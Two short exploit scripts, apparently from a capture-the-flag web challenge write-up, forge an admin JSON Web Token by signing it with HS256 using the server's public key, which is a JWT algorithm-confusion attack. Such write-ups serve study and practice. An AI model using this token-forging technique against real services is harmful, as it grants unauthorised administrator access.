File: write_up/web/easy/jwt/exp.js
const jwt = require('jsonwebtoken')
const fs = require('fs')
const publicKey = fs.readFileSync(__dirname + '/publicKey.pem')


const token = jwt.sign({ role: 'admin', "iat": 1614653028 }, publicKey, { algorithm: 'HS256' })
console.log(token)

File: write_up/web/easy/jwt/exp.py
import jwt
with open('./src/public/keys/publicKey.pem', 'rb') as publickfile:
    p = publickfile.read()
print(p)
encoded = jwt.encode({
    "role": "admin",
    "iat": 1613798737
}, p, algorithm="HS256")
print(encoded)
